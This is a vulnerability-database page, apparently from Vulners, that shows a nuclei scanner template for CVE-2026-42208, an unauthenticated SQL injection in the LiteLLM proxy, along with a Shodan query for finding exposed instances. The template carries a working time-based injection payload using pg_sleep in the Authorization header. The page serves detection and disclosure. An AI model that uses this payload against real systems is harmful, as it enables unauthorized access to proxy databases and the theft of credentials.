Lucene search
K

LiteLLM - SQL Injection

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 17 Views

LiteLLM SQL injection allows unauthenticated access to proxy database via crafted header.

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for SQL Injection in Litellm
10 May 202602:07
githubexploit
GithubExploit
Exploit for CVE-2026-42208
28 Apr 202616:57
githubexploit
GithubExploit
Exploit for SQL Injection in Litellm
30 May 202604:51
githubexploit
GithubExploit
Exploit for SQL Injection in Litellm
18 Jun 202623:40
githubexploit
GithubExploit
Exploit for SQL Injection in Litellm
22 May 202623:22
githubexploit
GithubExploit
Exploit for SQL Injection in Litellm
10 May 202612:11
githubexploit
ATTACKERKB
CVE-2026-42208
8 May 202603:38
attackerkb
Chainguard
CVE-2026-42208 vulnerabilities
6 May 202619:17
cgr
Circl
CVE-2026-42208
28 Apr 202605:12
circl
CISA KEV Catalog
BerriAI LiteLLM SQL Injection Vulnerability
8 May 202600:00
cisa_kev
Rows per page
id: CVE-2026-42208

info:
  name: LiteLLM - SQL Injection
  author: HAERIN-L
  severity: critical
  description: |
    LiteLLM 1.81.16 to < 1.83.7 contains a SQL injection caused by improper handling of caller-supplied key in database query during proxy API key checks, letting unauthenticated attackers read and modify database data, exploit requires crafted Authorization header.
  impact: |
    Unauthenticated attackers can read and modify proxy database, leading to unauthorized access and credential compromise.
  remediation: |
    Upgrade to version 1.83.7 or later.
  reference:
    - https://github.com/BerriAI/litellm/security/advisories/GHSA-r75f-5x8p-qvmc
    - https://www.sysdig.com/blog/cve-2026-42208-critical-sql-injection-litellm/
    - https://nvd.nist.gov/vuln/detail/CVE-2026-42208
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-42208
    epss-score: 0.86607
    epss-percentile: 0.99715
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 2
    vendor: BerriAI
    product: LiteLLM
    shodan-query: http.title:"LiteLLM"
  tags: cve,cve2026,litellm,sqli,unauthenticated,kev,vkev

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /ui/login/? HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /v1/chat/completions HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Authorization: Bearer invalid_token_baseline_test

        {}

    redirects: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_1, "litellm-asset-prefix")'
          - 'contains(content_type_2, "application/json")'
          - 'status_code_2 == 401'
        condition: and
        internal: true

  - raw:
      - |
        @timeout: 30s
        POST /v1/chat/completions HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Authorization: Bearer {{randstr}}' OR (SELECT pg_sleep(8)) IS NOT NULL --

        {}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 401'
          - 'duration >= 8'
        condition: and
# digest: 490a0046304402204488ef2f2039dcdacb9ac0974331d85cdba2ea1b8a2eb4ba77d117a59dea0e1d02204b48a2783c79cb1c623c4b0925db2c8d2ab738e02e132d1c1048c0f01e5452d9:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

30 May 2026 06:53Current
6.2Medium risk
Vulners AI Score6.2
CVSS 3.19.8
CVSS 49.3
EPSS0.86607
SSVC
17